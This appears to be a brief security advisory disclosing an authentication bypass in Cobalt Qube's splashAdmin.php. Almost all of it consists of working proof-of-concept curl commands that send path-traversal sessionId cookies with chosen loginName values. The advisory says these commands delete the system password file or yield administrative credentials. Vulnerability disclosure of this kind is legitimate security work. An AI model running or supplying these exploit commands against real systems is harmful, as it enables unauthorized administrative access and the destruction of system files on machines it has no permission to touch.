Cobalt Qube Authentication Bypass Vulnerability

Cobalt Qube Authentication Bypass Vulnerability

The following proof of concepts were provided by pokley <saleh@scan-associates.net>:
$curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash
http://192.168.0.1:444/splashAdmin.php

This will allow the attacker to delete the password file.

The following will enable the attacker to obtain administrative credentials on the vulnerable system.
$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php